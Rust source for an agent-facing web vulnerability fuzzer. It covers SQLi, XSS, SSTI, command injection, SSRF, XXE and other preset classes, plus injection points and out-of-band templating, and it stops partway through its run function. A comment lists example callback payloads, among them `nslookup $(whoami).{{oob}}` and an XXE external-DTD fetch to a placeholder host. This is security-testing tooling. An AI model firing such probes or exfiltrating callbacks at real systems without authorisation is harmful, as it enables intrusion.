//! High-level facade for AI agents.
//!
//! The agent doesn't need to know about chain weights, power schedules,
//! or signal classifiers. It just picks a vulnerability class and a target.
//!
//! ```ignore
//! let result = Fuzzer::new(my_probe)
//!     .sql_injection()
//!     .target("https://example.com/search?q=", "GET")
//!     .budget(100)
//!     .run()
//!     .await
//!     .unwrap();
//! // result.confirmed: Vec<Hit> — all confirmed SQLi payloads
//! ```

use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use async_trait::async_trait;
use url::Url;

use crate::baseline::BaselineProfile;
use crate::evolutionary::*;
use crate::payloads;
use crate::signals::signal::*;
use crate::signals::{Probe, Request, ProbeResponse};
use std::collections::HashMap;
use std::time::Duration;

/// Run a fixed, ordered list of items through `probe` with bounded concurrency
/// and optional rate limiting. Probes are pipelined — up to `max_concurrent`
/// in flight — but results are handed to `process` strictly in submission
/// order, so a sweep's output is independent of completion timing (it stays
/// deterministic). `process` receives the item, the request that was sent, and
/// the response (`None` on transport error / timeout); it returns `true` to
/// stop early (stop-on-confirmation), after which remaining in-flight probes
/// are dropped. Returns the number of probes submitted.
///
/// This is the table/inputs-sweep analogue of the evolutionary loop's window
/// pipeline. The sweep has no corpus feedback, so submission order is fixed up
/// front and ordered result processing alone gives determinism — there is no
/// shared RNG to serialize.
async fn run_sweep_concurrent<P, T, F, G>(
    probe: Arc<P>,
    items: Vec<T>,
    req_for: F,
    timeout: Duration,
    max_concurrent: usize,
    probe_interval: Option<Duration>,
    mut process: G,
) -> usize
where
    P: Probe + 'static,
    F: Fn(&T) -> Request,
    G: FnMut(T, Request, Option<ProbeResponse>) -> bool,
{
    use std::collections::VecDeque;
    use std::time::Instant;
    type Task = tokio::task::JoinHandle<
        Result<Result<ProbeResponse, String>, tokio::time::error::Elapsed>,
    >;

    let window = max_concurrent.max(1);
    let mut in_flight: VecDeque<(T, Request, Task)> = VecDeque::new();
    let mut iter = items.into_iter();
    let mut last_submit: Option<Instant> = None;
    let mut probes_sent = 0usize;

    loop {
        // Fill the window.
        while in_flight.len() < window {
            let Some(item) = iter.next() else { break };

            // Rate limit: pace submissions to the minimum interval.
            if let Some(interval) = probe_interval {
                if let Some(last) = last_submit {
                    let elapsed = last.elapsed();
                    if elapsed < interval {
                        tokio::time::sleep(interval - elapsed).await;
                    }
                }
                last_submit = Some(Instant::now());
            }

            let req = req_for(&item);
            let probe_clone = probe.clone();
            let req_send = req.clone();
            let handle = tokio::spawn(async move {
                tokio::time::timeout(timeout, probe_clone.send(&req_send)).await
            });
            probes_sent += 1;
            in_flight.push_back((item, req, handle));
        }

        // Process the oldest in-flight probe (submission order).
        let Some((item, req, handle)) = in_flight.pop_front() else { break };
        let outcome = match handle.await {
            Ok(Ok(Ok(r))) => Some(r),
            _ => None, // transport error, timeout, or join error
        };
        if process(item, req, outcome) {
            break; // stop-on-confirmation: drop remaining in-flight probes
        }
    }

    probes_sent
}

// ── Arc blanket impl for Probe ──────────────────────────────────────────

#[async_trait]
impl<P: Probe> Probe for Arc<P> {
    async fn send(&self, req: &Request) -> Result<ProbeResponse, String> {
        self.as_ref().send(req).await
    }
}

// ── Hit (simplified for agent consumption) ──────────────────────────────

/// Where a hit came from — useful for agent reasoning and audit trails.
#[derive(Debug, Clone)]
pub enum PayloadSource {
    /// From a built-in payload table.  e.g. `("sqli", 14)` = SQLI_PAYLOADS[14].
    Table { preset: String, index: usize },
    /// User-supplied payload (InputsOnly mode).
    UserInput { index: usize },
    /// Generated by the evolutionary engine (no fixed provenance).
    Evolutionary,
}

/// A single confirmed or interesting hit, simplified for agent readability.
#[derive(Debug, Clone)]
pub struct Hit {
    /// The payload string that triggered the hit.
    pub payload: String,
    /// Raw score from the feedback layer (0–6 for HttpFeedback).
    pub raw_score: u8,
    /// Confidence from baseline profiling (0.0 = unreliable, 1.0 = clean).
    pub confidence: f32,
    /// Adjusted score = raw_score × confidence.
    pub adjusted_score: f32,
    /// True if this is a confirmed vulnerability (and confidence > 0.3).
    pub confirmed: bool,
    /// Signal descriptions that survived baseline filtering.
    pub signals: Vec<String>,
    /// Signals that were suppressed because the baseline also triggered them.
    pub suppressed: Vec<String>,
    /// Where this payload came from (table, user input, or evolutionary).
    pub source: PayloadSource,
    /// Curated impact hint (`critical`/`high`/…), present for table-sourced hits.
    pub severity: Option<String>,
    /// Curated description of the payload, present for table-sourced hits.
    pub description: Option<String>,
    /// Curated injection context (`html_body`/`json`/`xml`/…), for table hits.
    pub context: Option<String>,
}

/// Curated metadata carried from a `PayloadCase` into a table-sweep `Hit`.
#[derive(Clone)]
struct CaseMeta {
    severity: String,
    description: String,
    context: String,
}

/// Final result returned to the agent.
#[derive(Debug, Clone)]
pub struct FuzzResult {
    /// Confirmed hits (high-confidence vulnerabilities).
    pub confirmed: Vec<Hit>,
    /// All interesting payloads including unconfirmed.
    pub interesting: Vec<Hit>,
    /// How many probes were sent.
    pub probes_sent: usize,
    /// Final corpus size (seeds + discovered).
    pub corpus_size: usize,
    /// Baseline health summary for audit trail.
    pub baseline: String,
    /// OOB payloads skipped because no collaborator (`{{oob}}`) was configured.
    pub oob_skipped: usize,
}

impl FuzzResult {
    pub fn has_hits(&self) -> bool { !self.confirmed.is_empty() }
}

// ── Fuzz mode ───────────────────────────────────────────────────────────

/// What kind of run to execute — table sweep, evolutionary, or hybrid.
///
/// Table and InputsOnly are exact sweeps: payloads are sent in order,
/// no corpus scheduling, no mutation, no randomness.
/// TableThenEvolutionary and Evolutionary funnel through the standard
/// evolutionary loop.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum FuzzMode {
    /// Run the exact payload table once, no mutation, no randomness.
    /// Best for: predictable first-pass coverage, agent audit trails.
    Table,
    /// Run table first, seed corpus from interesting hits, then evolve.
    /// Best for: broad coverage + adaptive depth.
    TableThenEvolutionary,
    /// Pure evolutionary from seeds (current default).
    /// Best for: deep exploration, novel payload discovery.
    Evolutionary,
    /// Run only the user-supplied payloads, no built-in tables, no mutation.
    /// Best for: "try these exact payloads."
    InputsOnly,
}

// ── Vulnerability preset ────────────────────────────────────────────────

// Presets are thin — they combine a vuln class table, a signal set, and
// a default gen_ratio. The mode (Table/Evolutionary/etc.) is separate and
// controls whether the engine uses the corpus scheduler or walks linearly.

struct Preset {
    table: Option<payloads::PayloadTable>,
    atoms: Vec<String>,
    chain: ChainTable,
    seeds: Vec<String>,
    signal_set: SignalSet,
    feedback: Box<dyn Feedback>,
    gen_ratio: f32,
    placement: PlacementPolicy,
    length: LengthPolicy,
    // Mode is NOT stored here — it's on the Fuzzer builder.
}

impl Default for Preset {
    fn default() -> Self {
        Self {
            table: None,
            atoms: ATOMS.iter().map(|s| s.to_string()).collect(),
            chain: ChainTable::defaults(),
            seeds: vec![],
            signal_set: SignalSet::defaults(),
            feedback: Box::new(HttpFeedback::default()),
            gen_ratio: 0.7, // safe default — moderate generation
            placement: PlacementPolicy::default(),
            length: LengthPolicy::medium(),
        }
    }
}

impl Preset {
    fn sql_injection() -> Self {
        Self {
            table: Some(payloads::sqli_table()),
            atoms: ATOMS.iter().map(|s| s.to_string()).collect(),
            chain: ChainTable::defaults(),
            seeds: payloads::sqli_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(ErrorClassifier::dbms_starter()))
                .with(Box::new(TimeDelayClassifier::default())),
            feedback: Box::new(HttpFeedback::default()),
            gen_ratio: 0.8, // per-class: plateaus at 0.8 (944 hits/1k)
            placement: PlacementPolicy::default(),
            length: LengthPolicy::medium(), // SQLi not length-sensitive
        }
    }

    fn xss() -> Self {
        Self {
            table: Some(payloads::xss_table()),
            seeds: payloads::xss_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(ReflectionClassifier))
                .with(Box::new(BodyDiffClassifier)),
            gen_ratio: 0.8, // per-class: jumps at 0.8 (902 vs 824 at 0.7)
            length: LengthPolicy::short(), // calib: shorter chains win, even for XSS vectors
            ..Default::default()
        }
    }

    fn ssti() -> Self {
        Self {
            table: Some(payloads::ssti_table()),
            seeds: payloads::ssti_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(ReflectionClassifier))
                .with(Box::new(ErrorClassifier::dbms_starter())),
            gen_ratio: 0.8, // per-class: peaks at 0.8 (964 hits/1k)
            length: LengthPolicy::short(), // calib: long() is the worst choice for SSTI
            ..Default::default()
        }
    }

    fn command_injection() -> Self {
        Self {
            table: Some(payloads::cmd_table()),
            seeds: payloads::cmd_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(TimeDelayClassifier::default()))
                .with(Box::new(SizeClassifier::default())),
            gen_ratio: 0.7, // per-class: already hot at low gen (906 at 0.0), plateaus at 0.7 (951)
            length: LengthPolicy::short(), // short chains sufficient — trigger is simple
            ..Default::default()
        }
    }

    fn path_traversal() -> Self {
        Self {
            table: Some(payloads::traversal_table()),
            seeds: payloads::traversal_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(SizeClassifier::default()))
                .with(Box::new(ReflectionClassifier))
                .with(Box::new(BodySignatureClassifier::file_read())),
            gen_ratio: 0.7, // similar profile to XSS
            length: LengthPolicy::short(), // calib: shorter chains win for path traversal too
            ..Default::default()
        }
    }

    fn nosql_injection() -> Self {
        Self {
            table: Some(payloads::nosqli_table()),
            seeds: payloads::nosqli_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(SizeClassifier::default()))
                .with(Box::new(ErrorClassifier::dbms_starter()))
                .with(Box::new(TimeDelayClassifier::default())),
            gen_ratio: 0.7, // similar to SQLi profile
            length: LengthPolicy::short(), // NoSQL operators are compact
            ..Default::default()
        }
    }

    fn ssrf() -> Self {
        Self {
            table: Some(payloads::ssrf_table()),
            seeds: payloads::ssrf_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(SizeClassifier::default()))
                .with(Box::new(TimeDelayClassifier::default()))
                .with(Box::new(BodySignatureClassifier::cloud_metadata())),
            gen_ratio: 0.0, // pure havoc — generation doesn't help URL-based payloads
            ..Default::default()
        }
    }

    fn xxe() -> Self {
        Self {
            table: Some(payloads::xxe_table()),
            seeds: payloads::xxe_table().payloads(),
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(SizeClassifier::default()))
                .with(Box::new(ReflectionClassifier))
                .with(Box::new(BodySignatureClassifier::file_read())),
            gen_ratio: 0.0, // pure havoc — structured XML benefits from mutation not generation
            ..Default::default()
        }
    }

    fn prototype_pollution() -> Self {
        Self {
            table: Some(payloads::proto_pollution_table()),
            seeds: payloads::proto_pollution_table().payloads(),
            // Blind PP is hard to confirm over HTTP without a probe gadget; this
            // is a best-effort signal set (status change / error / body diff).
            // Detection is the piece to refine next — the payload corpus is the
            // point of adding the class now.
            signal_set: SignalSet::new()
                .with(Box::new(StatusClassifier))
                .with(Box::new(ErrorClassifier::dbms_starter()))
                .with(Box::new(BodyDiffClassifier)),
            gen_ratio: 0.5, // structured JSON — some generation, mostly havoc from seeds
            length: LengthPolicy::short(),
            ..Default::default()
        }
    }
}

// ── Injection point ────────────────────────────────────────────────────

/// Where the payload is injected into the request.
#[derive(Debug, Clone)]
pub enum InjectionPoint {
    /// URL-encoded into a query parameter. Produces `?name=<encoded>`.
    /// Default for GET.
    QueryParam(String),
    /// Body injection with optional template and Content-Type.
    /// `template` is a string with `{{payload}}` as placeholder.
    /// `None` = raw body (backward compatible).
    BodyRaw {
        template: Option<String>,
        content_type: Option<String>,
    },
    /// Injects into a header value (for Host, User-Agent, Cookie, etc.).
    Header(String),
    /// Appends to the URL path: `/existing/path/<payload>`.
    PathSegment,
}

impl InjectionPoint {
    /// Raw body, no template, no Content-Type.
    pub fn body_raw() -> Self {
        InjectionPoint::BodyRaw { template: None, content_type: None }
    }

    /// Form-encoded body: `key=value&param={{payload}}`.
    pub fn body_form(template: &str) -> Self {
        InjectionPoint::BodyRaw {
            template: Some(template.into()),
            content_type: Some("application/x-www-form-urlencoded".into()),
        }
    }

    /// JSON body: `{"key": "{{payload}}"}`.
    pub fn body_json(template: &str) -> Self {
        InjectionPoint::BodyRaw {
            template: Some(template.into()),
            content_type: Some("application/json".into()),
        }
    }

    /// XML body: `<key>{{payload}}</key>`.
    pub fn body_xml(template: &str) -> Self {
        InjectionPoint::BodyRaw {
            template: Some(template.into()),
            content_type: Some("application/xml".into()),
        }
    }

    /// GraphQL body: `{"query": "{ user(id: \"{{payload}}\") { name } }"}`.
    pub fn body_graphql(template: &str) -> Self {
        InjectionPoint::BodyRaw {
            template: Some(template.into()),
            content_type: Some("application/json".into()),
        }
    }

    /// Custom body with explicit Content-Type.
    pub fn body_template(content_type: &str, template: &str) -> Self {
        InjectionPoint::BodyRaw {
            template: Some(template.into()),
            content_type: Some(content_type.into()),
        }
    }
}

impl InjectionPoint {
    /// Apply the injection to a URL+method, producing a full Request.
    fn apply(&self, base_url: &str, method: &str, payload: &str) -> Request {
        match self {
            InjectionPoint::QueryParam(name) => {
                let mut url = Url::parse(base_url).unwrap_or_else(|_| {
                    Url::parse(&format!("http://{}/", base_url)).unwrap()
                });
                url.query_pairs_mut().append_pair(name, payload);
                Request {
                    url: url.to_string(),
                    method: method.to_string(),
                    headers: HashMap::new(),
                    body: String::new(),
                }
            }
            InjectionPoint::BodyRaw { template, content_type } => {
                let body = match template {
                    Some(tpl) => tpl.replace("{{payload}}", payload),
                    None => payload.to_string(),
                };
                let headers = match content_type {
                    Some(ct) => {
                        let mut h = HashMap::new();
                        h.insert("Content-Type".into(), ct.clone());
                        h
                    }
                    None => HashMap::new(),
                };
                Request {
                    url: base_url.to_string(),
                    method: method.to_string(),
                    headers,
                    body,
                }
            }
            InjectionPoint::Header(name) => {
                let mut headers = HashMap::new();
                headers.insert(name.clone(), payload.to_string());
                Request {
                    url: base_url.to_string(),
                    method: method.to_string(),
                    headers,
                    body: String::new(),
                }
            }
            InjectionPoint::PathSegment => {
                let mut url = Url::parse(base_url).unwrap_or_else(|_| {
                    Url::parse(&format!("http://{}/", base_url)).unwrap()
                });
                let path = url.path().trim_end_matches('/').to_string();
                url.set_path(&format!("{}/{}", path, payload));
                Request {
                    url: url.to_string(),
                    method: method.to_string(),
                    headers: HashMap::new(),
                    body: String::new(),
                }
            }
        }
    }
}

// ── Fuzzer builder ───────────────────────────────────────────────────────

/// High-level fuzzer interface for AI agents.
pub struct Fuzzer<P: Probe> {
    probe: Arc<P>,
    preset: Preset,
    mode: FuzzMode,
    target_url: String,
    method: String,
    injection: InjectionPoint,
    budget: usize,
    replay_seed: Option<u64>,
    request_timeout: Duration,
    additional_seeds: Vec<String>,
    stop_on_confirmation: bool,
    /// Optional progress callback: `(probes_sent, total_budget)`. Called once per probe.
    progress: Option<Arc<dyn Fn(usize, usize) + Send + Sync>>,
    /// Recall-first: bolt on the NoveltyClassifier to flag any unusual response.
    hunt: bool,
    /// Static headers merged into every request (baseline + probes), e.g. an
    /// auth `Cookie` or `Authorization`. Never overwrite injection-set headers.
    extra_headers: HashMap<String, String>,
    /// Maximum concurrent in-flight probes (1 = sequential, backward-compatible).
    max_concurrent: usize,
    /// Minimum interval between probe submissions (rate limiting).
    probe_interval: Option<Duration>,
    /// Out-of-band collaborator host for `{{oob}}` substitution (see the module
    /// note above [`substitute_oob`]). `None` = OOB payloads are skipped.
    oob_host: Option<String>,
}

// ── Out-of-band (OOB) collaborator templating ──────────────────────────────
//
// Payloads that need a call-back (blind command injection, OOB XXE, SSRF probes,
// DNS exfil) carry the placeholder `{{oob}}`. A collaborator server is
// per-engagement infrastructure that CANNOT be baked into the corpus, so it is
// substituted at run time from `--oob-url` / `Fuzzer::oob()`.
//
// IMPORTANT — `{{oob}}` is a BARE HOST, not a URL. This is deliberate and it is
// the one thing to get right here:
//
//   * Payloads write their OWN scheme:  `curl http://{{oob}}/x`, `gopher://{{oob}}:80/`,
//     XXE `SYSTEM "http://{{oob}}/evil.dtd"`. That keeps every call site
//     unambiguous — you can see the protocol in the payload — and it lets DNS /
//     non-HTTP contexts work: `nslookup $(whoami).{{oob}}` must NOT become
//     `nslookup $(whoami).http://host`.
//   * This mirrors what nuclei's `{{interactsh-url}}` actually resolves to (a
//     host, despite the "-url" in its name). We accept `{{interactsh-url}}` as
//     an ALIAS so nuclei templates paste in unchanged, but the native token is
//     `{{oob}}` — neutral and honestly named, not tied to one vendor's tool.
//   * `oob_host_of` extracts the host from whatever the user passes (a full URL
//     `http://x.oast.example/…` or a bare host `x.oast.example`), so the flag
//     stays URL-shaped (familiar) while substitution stays host-shaped (correct).
//
// When no collaborator is set, a payload still containing `{{oob}}` cannot
// function (it would hit a literal, unresolvable host), so such payloads are
// SKIPPED before the run rather than sent as noise — recall-first: a dead OOB
// probe is not a finding, and skipping keeps the budget on live payloads.

/// The two OOB placeholder tokens: the native `{{oob}}` and the nuclei alias.
const OOB_TOKENS: [&str; 2] = ["{{oob}}", "{{interactsh-url}}"];

/// True if the payload carries an unresolved OOB placeholder.
fn has_oob_placeholder(s: &str) -> bool {
    OOB_TOKENS.iter().any(|t| s.contains(t))
}

/// Replace every OOB token with `host` (a bare hostname). No-op when `host`
/// is `None` — callers skip such payloads before this is reached.
fn substitute_oob(payload: &str, host: &Option<String>) -> String {
    match host {
        Some(h) => {
            let mut out = payload.to_string();
            for t in OOB_TOKENS {
                if out.contains(t) { out = out.replace(t, h); }
            }
            out
        }
        None => payload.to_string(),
    }
}

/// Extract a bare host from a user-supplied collaborator value, accepting either
/// a full URL (`http://x.oast.example:8080/p`) or a bare host (`x.oast.example`).
fn oob_host_of(raw: &str) -> String {
    let s = raw.trim();
    let after_scheme = s.rsplit("://").next().unwrap_or(s); // drop scheme if any
    after_scheme.split(['/', ':']).next().unwrap_or(after_scheme).to_string()
}

impl<P: Probe + 'static> Fuzzer<P> {
    pub fn new(probe: Arc<P>) -> Self {
        Self {
            probe,
            preset: Preset::default(),
            mode: FuzzMode::Evolutionary,
            target_url: String::new(),
            method: "GET".into(),
            injection: InjectionPoint::QueryParam("q".into()),
            budget: 50,
            replay_seed: None,
            request_timeout: Duration::from_secs(30),
            additional_seeds: vec![],
            stop_on_confirmation: false,
            progress: None,
            hunt: false,
            extra_headers: HashMap::new(),
            max_concurrent: 1,
            probe_interval: None,
            oob_host: None,
        }
    }

    /// Set the out-of-band collaborator for `{{oob}}` substitution. Accepts a
    /// full URL or a bare host; the host is extracted (see [`oob_host_of`]).
    /// Without it, OOB payloads are skipped. Also resolves the `{{interactsh-url}}`
    /// alias.
    pub fn oob(mut self, url_or_host: &str) -> Self {
        self.oob_host = Some(oob_host_of(url_or_host));
        self
    }

    /// Set the fuzz mode (Table, Evolutionary, TableThenEvolutionary, InputsOnly).
    pub fn mode(mut self, m: FuzzMode) -> Self { self.mode = m; self }

    pub fn sql_injection(mut self) -> Self { self.preset = Preset::sql_injection(); self }
    pub fn xss(mut self) -> Self { self.preset = Preset::xss(); self }
    pub fn ssti(mut self) -> Self { self.preset = Preset::ssti(); self }
    pub fn command_injection(mut self) -> Self { self.preset = Preset::command_injection(); self }
    pub fn path_traversal(mut self) -> Self { self.preset = Preset::path_traversal(); self }
    pub fn nosql_injection(mut self) -> Self { self.preset = Preset::nosql_injection(); self }
    pub fn ssrf(mut self) -> Self { self.preset = Preset::ssrf(); self }
    pub fn xxe(mut self) -> Self { self.preset = Preset::xxe(); self }
    pub fn prototype_pollution(mut self) -> Self { self.preset = Preset::prototype_pollution(); self }
    /// Convenience: table sweep with the current preset's table.
    pub fn table_sweep(mut self) -> Self { self.mode = FuzzMode::Table; self }

    pub fn target(mut self, url: &str, method: &str) -> Self {
        self.target_url = url.to_string();
        self.method = method.to_uppercase();
        // Default injection: query param for GET, body for POST
        if self.method == "POST" {
            self.injection = InjectionPoint::body_raw();
        } else {
            self.injection = InjectionPoint::QueryParam("q".into());
        }
        self
    }

    /// Inject payloads into the named query parameter (URL-encoded).
    ///
    /// Produces: `https://target/path?name=<url-encoded payload>`.
    /// Handles existing query params correctly (appends `&name=...`).
    pub fn inject_query(mut self, param: &str) -> Self {
        self.injection = InjectionPoint::QueryParam(param.into());
        self
    }

    /// Inject payloads into a header value.
    pub fn inject_header(mut self, name: &str) -> Self {
        self.injection = InjectionPoint::Header(name.into());
        self
    }

    /// Inject payloads as the raw request body (no Content-Type).
    pub fn inject_body_raw(mut self) -> Self {
        self.injection = InjectionPoint::body_raw();
        self
    }

    /// Inject payloads as a path segment: `/existing/path/<payload>`.
    pub fn inject_path(mut self) -> Self {
        self.injection = InjectionPoint::PathSegment;
        self
    }

    /// Form-encoded POST body. `{{payload}}` is substituted.
    ///
    /// Sets `Content-Type: application/x-www-form-urlencoded`.
    ///
    /// Example: `.body_form("username=admin&password={{payload}}")`
    pub fn body_form(mut self, template: &str) -> Self {
        self.injection = InjectionPoint::body_form(template);
        self
    }

    /// JSON POST body. `{{payload}}` is substituted.
    ///
    /// Sets `Content-Type: application/json`.
    ///
    /// Example: `.body_json(r#"{"search":"{{payload}}"}"#)`
    pub fn body_json(mut self, template: &str) -> Self {
        self.injection = InjectionPoint::body_json(template);
        self
    }

    /// XML POST body. `{{payload}}` is substituted.
    ///
    /// Sets `Content-Type: application/xml`.
    pub fn body_xml(mut self, template: &str) -> Self {
        self.injection = InjectionPoint::body_xml(template);
        self
    }

    /// GraphQL POST body. `{{payload}}` is substituted.
    ///
    /// Sets `Content-Type: application/json`.
    ///
    /// Example: `.body_graphql(r#"{"query":"{user(id:\"{{payload}}\"){name}}"}"#)`
    pub fn body_graphql(mut self, template: &str) -> Self {
        self.injection = InjectionPoint::body_graphql(template);
        self
    }

    /// Custom body with explicit Content-Type. `{{payload}}` is substituted.
    ///
    /// Example: `.body_template("text/plain", "prefix-{{payload}}-suffix")`
    pub fn body_template(mut self, content_type: &str, template: &str) -> Self {
        self.injection = InjectionPoint::body_template(content_type, template);
        self
    }

    pub fn budget(mut self, probes: usize) -> Self { self.budget = probes.max(1); self }

    pub fn seeds<I, S>(mut self, seeds: I) -> Self
    where I: IntoIterator<Item = S>, S: Into<String>,
    { self.additional_seeds = seeds.into_iter().map(|s| s.into()).collect(); self }

    pub fn replay_seed(mut self, seed: u64) -> Self { self.replay_seed = Some(seed); self }
    pub fn request_timeout(mut self, t: Duration) -> Self { self.request_timeout = t; self }
    pub fn gen_ratio(mut self, r: f32) -> Self { self.preset.gen_ratio = r.clamp(0.0, 1.0); self }
    pub fn stop_on_first_hit(mut self) -> Self { self.stop_on_confirmation = true; self }

    /// Recall-first hunt mode: append the `NoveltyClassifier` so any response
    /// unlike the baseline's fingerprint is flagged as `anomalous`, even without
    /// a matching vuln signature. Accepts false positives to avoid misses.
    pub fn hunt(mut self) -> Self { self.hunt = true; self }

    /// Add a static header sent on every request (baseline + probes) — e.g. an
    /// auth `Cookie` or `Authorization`. Does not overwrite injection-set headers.
    pub fn header(mut self, name: &str, value: &str) -> Self {
        self.extra_headers.insert(name.to_string(), value.to_string());
        self
    }

    /// Convenience for `header("Cookie", value)`.
    pub fn cookie(self, value: &str) -> Self { self.header("Cookie", value) }

    /// Attach a progress callback. Called as `f(probes_sent, total_budget)` per probe.
    pub fn on_progress(mut self, cb: Arc<dyn Fn(usize, usize) + Send + Sync>) -> Self {
        self.progress = Some(cb);
        self
    }

    /// Set the maximum number of concurrent in-flight probes (default: 1 = sequential).
    ///
    /// When > 1, probes are pipelined: candidates are generated sequentially
    /// (deterministic), but up to `n` probes are in flight simultaneously.
    /// Results are processed in submission order to keep corpus evolution
    /// deterministic.
    ///
    /// Replay note: same seed + same concurrency = same sequence.
    /// Use 1 for bit-exact sequential replay.
    pub fn concurrency(mut self, n: usize) -> Self {
        self.max_concurrent = n.max(1);
        self
    }

    /// Set a rate limit in requests per second. The loop paces probe submissions
    /// to stay at or below this rate. Orthogonal to concurrency.
    pub fn rate_limit(mut self, req_per_sec: f32) -> Self {
        if req_per_sec > 0.0 {
            let ms = (1000.0 / req_per_sec) as u64;
            self.probe_interval = Some(Duration::from_millis(ms));
        }
        self
    }

    /// Set an explicit delay between probe submissions (alternative to `rate_limit`).
    pub fn probe_interval(mut self, interval: Duration) -> Self {
        self.probe_interval = Some(interval);
        self
    }

    // ── Run ───────────────────────────────────────────────────────────

    pub async fn run(mut self) -> Result<FuzzResult, String> {
        let probe = self.probe.clone();

        // Recall-first hunt mode: bolt the novelty detector onto the signal set
        // before the baseline is captured, so it learns the baseline fingerprint.
        if self.hunt {
            self.preset.signal_set.push(Box::new(NoveltyClassifier::new()));
        }

        // ── Baseline: same shape as fuzzed requests ──────────────────
        let injection = self.injection.clone();
        let url = self.target_url.clone();
        let method = self.method.clone();
        let extra_headers = self.extra_headers.clone();
        // Merge static headers without clobbering what the injection point set.
        let merge_headers = |mut r: Request, extra: &HashMap<String, String>| -> Request {
            for (k, v) in extra {
                r.headers.entry(k.clone()).or_insert_with(|| v.clone());
            }
            r
        };
        let baseline_req = merge_headers(injection.apply(&url, &method, ""), &extra_headers);
        let baseline_resp = self.probe.send(&baseline_req).await
            .map_err(|e| format!("baseline probe failed: {e}"))?;

        let baseline_profile = BaselineProfile::capture(&baseline_resp, &self.preset.signal_set);

        let budget = self.budget;
        let progress_cb = self.progress.clone();
        let probe_count = Arc::new(AtomicUsize::new(0));

        // OOB collaborator host: substituted into `{{oob}}` at injection time so
        // it reaches table, evolutionary, and mutated payloads alike. When unset,
        // payloads still carrying the placeholder are filtered out below.
        let oob_host = self.oob_host.clone();
        let oob_host_inject = self.oob_host.clone();

        let inject = move |payload: &str| -> Request {
            let n = probe_count.fetch_add(1, Ordering::Relaxed) + 1;
            if let Some(cb) = &progress_cb {
                cb(n, budget);
            }
            let resolved = substitute_oob(payload, &oob_host_inject);
            let mut r = injection.apply(&url, &method, &resolved);
            for (k, v) in &extra_headers {
                r.headers.entry(k.clone()).or_insert_with(|| v.clone());
            }
            r
        };

        // ── Table / InputsOnly: exact sweep — no corpus, no mutation, no randomness ──
        if matches!(self.mode, FuzzMode::Table | FuzzMode::InputsOnly) {
            type SweepItem = (String, PayloadSource, Option<CaseMeta>);
            let mut entries: Vec<SweepItem> = match self.mode {
                FuzzMode::Table => {
                    let table = self.preset.table.as_ref()
                        .ok_or_else(|| "Table mode requires a preset with a payload table".to_string())?;
                    let preset_name = table.name.clone();
                    table.cases.iter().enumerate().map(|(i, c)| {
                        let meta = CaseMeta {
                            severity: c.severity.clone(),
                            description: c.description.clone(),
                            context: c.context.clone(),
                        };
                        (c.payload.clone(),
                         PayloadSource::Table { preset: preset_name.clone(), index: i },
                         Some(meta))
                    }).collect()
                }
                FuzzMode::InputsOnly => {
                    self.additional_seeds.iter().enumerate().map(|(i, s)| {
                        (s.clone(), PayloadSource::UserInput { index: i }, None)
                    }).collect()
                }
                _ => unreachable!(),
            };

            // Skip OOB payloads when no collaborator is set — they can't fire.
            let oob_skipped = if oob_host.is_none() {
                let before = entries.len();
                entries.retain(|(p, _, _)| !has_oob_placeholder(p));
                before - entries.len()
            } else { 0 };

            let signal_set = &self.preset.signal_set;
            let feedback = &*self.preset.feedback;
            let sweep_budget = self.budget.min(entries.len());
            let items: Vec<SweepItem> =
                entries.into_iter().take(sweep_budget).collect();

            let mut hits: Vec<Hit> = Vec::new();
            let mut interesting: Vec<Hit> = Vec::new();
            let stop_on_confirmation = self.stop_on_confirmation;

            // Concurrent, order-preserving sweep — honours --concurrency and
            // --rate-limit just like the evolutionary path.
            let probes_sent = run_sweep_concurrent(
                probe.clone(),
                items,
                |item: &SweepItem| inject(&item.0),
                self.request_timeout,
                self.max_concurrent,
                self.probe_interval,
                |(payload, source, meta): SweepItem,
                 req: Request,
                 outcome: Option<ProbeResponse>| {
                    let Some(resp) = outcome else { return false };
                    let (m_sev, m_desc, m_ctx) = match meta {
                        Some(m) => (Some(m.severity), Some(m.description), Some(m.context)),
                        None => (None, None, None),
                    };

                    // Classify — then filter through baseline profile.
                    let raw_signals = signal_set.run(&payload, &baseline_resp, &resp);
                    let signals = baseline_profile.filter(&raw_signals);

                    let ctx = EvaluationContext {
                        payload: &payload,
                        request: &req,
                        baseline: &baseline_resp,
                        response: &resp,
                        probe_error: None,
                        raw_signals: &raw_signals,
                        filtered_signals: &signals,
                    };
                    let eval = feedback.evaluate(&ctx);

                    if eval.interesting {
                        let filtered_kinds: std::collections::HashSet<&str> =
                            signals.iter().map(|s| s.kind()).collect();
                        let ambient: Vec<Signal> = raw_signals
                            .into_iter()
                            .filter(|s| !filtered_kinds.contains(s.kind()))
                            .collect();

                        let confidence = baseline_profile.confidence();
                        let hit = Hit {
                            payload,
                            raw_score: eval.score,
                            confidence,
                            adjusted_score: eval.score as f32 * confidence,
                            confirmed: eval.confirmed && confidence > 0.3,
                            signals: signals.iter().map(|s| s.kind().to_string()).collect(),
                            suppressed: ambient.iter().map(|s| s.kind().to_string()).collect(),
                            source,
                            severity: m_sev,
                            description: m_desc,
                            context: m_ctx,
                        };

                        if hit.confirmed {
                            hits.push(hit.clone());
                        }
                        interesting.push(hit);

                        // Stop-on-confirmation: halt the sweep.
                        if eval.confirmed && stop_on_confirmation {
                            return true;
                        }
                    }
                    false
                },
            ).await;

            return Ok(FuzzResult {
                confirmed: hits,
                interesting,
                probes_sent,
                corpus_size: 0,
                baseline: baseline_profile.summary(),
                oob_skipped,
            });
        }

        // ── TableThenEvolutionary: exact sweep then evolve ──
        let mut extra_seeds: Vec<String> = Vec::new();
        if matches!(self.mode, FuzzMode::TableThenEvolutionary) {
            let table = self.preset.table.as_ref()
